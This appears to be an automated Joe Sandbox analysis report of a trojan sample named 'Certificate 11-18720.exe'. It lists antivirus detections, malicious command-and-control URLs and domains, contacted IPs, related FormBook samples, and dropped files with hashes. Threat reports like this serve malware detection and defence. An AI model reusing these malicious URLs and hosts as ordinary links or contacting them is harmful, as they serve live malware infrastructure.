            SourceDetectionScannerLabelLink
            Certificate 11-18720.exe96%ReversingLabsWin32.Trojan.AutoitInject
            Certificate 11-18720.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd0%Avira URL Cloudsafe
            https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.elettrosistemista.zip
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.antonio-vivaldi.mobi
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.empowermedeco.com/fo8o/false
                                              		high
                                              http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWdtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWdtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.elettrosistemista.zip/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.magmadokum.com/fo8o/false
                                                		high
                                                http://www.rssnewscast.com/fo8o/false
                                                  		high
                                                  http://www.3xfootball.com/fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWdtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWdtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWdtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.goldenjade-travel.com/fo8o/false
                                                    		high
                                                    http://www.techchains.info/fo8o/false
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.empowermedeco.comAQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4137332421.0000000004A63000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000003.00000002.4136427268.0000000003EEE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4137916107.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.sedo.com/services/parking.php3AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.000000000318E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000003.00000002.4136427268.0000000004212000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000034B2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000003.00000003.2035358535.00000000077DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnRnetbtugc.exe, 00000003.00000002.4136427268.000000000485A000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.0000000003AFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  91.195.240.94
                                                                                  		www.rssnewscast.comGermany
                                                                                  		47846SEDO-ASDEfalse
                                                                                  154.215.72.110
                                                                                  		www.3xfootball.comSeychelles
                                                                                  		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                  195.110.124.133
                                                                                  		elettrosistemista.zipItaly
                                                                                  		39729REGISTER-ASITfalse
                                                                                  116.50.37.244
                                                                                  		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                  		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                  85.159.66.93
                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                  		34619CIZGITRfalse
                                                                                  66.29.149.46
                                                                                  		www.techchains.infoUnited States
                                                                                  		19538ADVANTAGECOMUSfalse
                                                                                  217.196.55.202
                                                                                  		empowermedeco.comNorway
                                                                                  		29300AS-DIRECTCONNECTNOfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1562576
                                                                                  Start date and time:2024-11-25 18:10:21 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 37s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:8
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:Certificate 11-18720.exe
                                                                                  (renamed file extension from exe_ to exe)
                                                                                  Original Sample Name:Certificate 11-18720.exe_
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/3@14/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 98%
                                                                                  • Number of executed functions: 53
                                                                                  • Number of non-executed functions: 296
                                                                                  Cookbook Comments:
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target AQvzsYASIFuMivlIGfCCjBw.exe, PID 5956 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: Certificate 11-18720.exe

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  12:12:07API Interceptor11344594x Sleep call for process: netbtugc.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  91.195.240.94Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  glued.htaGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                  N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                  Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                                  195.110.124.133Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • www.officinadelpasso.shop/te2d/
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.elettrosistemista.zip/fo8o/
                                                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.nutrigenfit.online/2vhi/
                                                                                  RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.nutrigenfit.online/2vhi/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.3xfootball.comCertificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  www.goldenjade-travel.comCertificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKloligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.195.240.49
                                                                                  loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 154.193.88.157
                                                                                  Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.216.76.80
                                                                                  Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.216.76.80
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                  • 156.251.17.224
                                                                                  Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  REGISTER-ASITCertificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 195.110.124.133
                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 195.110.124.133
                                                                                  S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DONGFONG-TWDongFongTechnologyCoLtdTWCertificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  SEDO-ASDECertificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\aut15DD.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Certificate 11-18720.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.9943258967865996
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:pFFPnrcERM01mgVoiWWDNFv5j+ia45dJUaV2X2QZ:XFvwu5VJWWD5j0CrUc0Z
                                                                                  MD5:AD39C6BEF2EE20589F7A6D816524B642
                                                                                  SHA1:B90B7C5FF956BCF4B28EC799EBBC142F0B1B03E3
                                                                                  SHA-256:57B3EDF2C964E554A548518224BD8C51F51CF208351977602CE5A6E79A01B531
                                                                                  SHA-512:32F41606E357137CE8897A921ACEE0A365A0D2081B5F78926603C581C93D73C8653354AD5AFF41509AD2B0631863C636E058C8FC065F7CCC599098B516262441
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:.....22Y2`..S...~.DI..n@O...280QZELC5BHDJIWGFCG22Y280QZELC.BHDDV.IF.N...3t.p.-%0.2:+-;6*f &\\6F.R4z79-.+&d...g+,#W.T?2.QZELC5B1EC.j'!.zRU..XW.@..."/.P...z# .(....1=..*V*u$-.WGFCG22Yb}0Q.DMC.*..JIWGFCG2.Y09;PQELS1BHDJIWGFC.'2Y2(0QZeHC5B.DJYWGFAG24Y280QZEJC5BHDJIWgBCG02Y280QXE..5BXDJYWGFCW22I280QZE\C5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZEb7P:<DJI.HBCG"2Y2(4QZULC5BHDJIWGFCG2.Y2X0QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y28

                                                                                  C:\Users\user\AppData\Local\Temp\orographically

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Certificate 11-18720.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):270848
                                                                                  Entropy (8bit):7.9943258967865996
                                                                                  Encrypted:true
                                                                                  SSDEEP:6144:pFFPnrcERM01mgVoiWWDNFv5j+ia45dJUaV2X2QZ:XFvwu5VJWWD5j0CrUc0Z
                                                                                  MD5:AD39C6BEF2EE20589F7A6D816524B642
                                                                                  SHA1:B90B7C5FF956BCF4B28EC799EBBC142F0B1B03E3
                                                                                  SHA-256:57B3EDF2C964E554A548518224BD8C51F51CF208351977602CE5A6E79A01B531
                                                                                  SHA-512:32F41606E357137CE8897A921ACEE0A365A0D2081B5F78926603C581C93D73C8653354AD5AFF41509AD2B0631863C636E058C8FC065F7CCC599098B516262441
                                                                                  Malicious:false
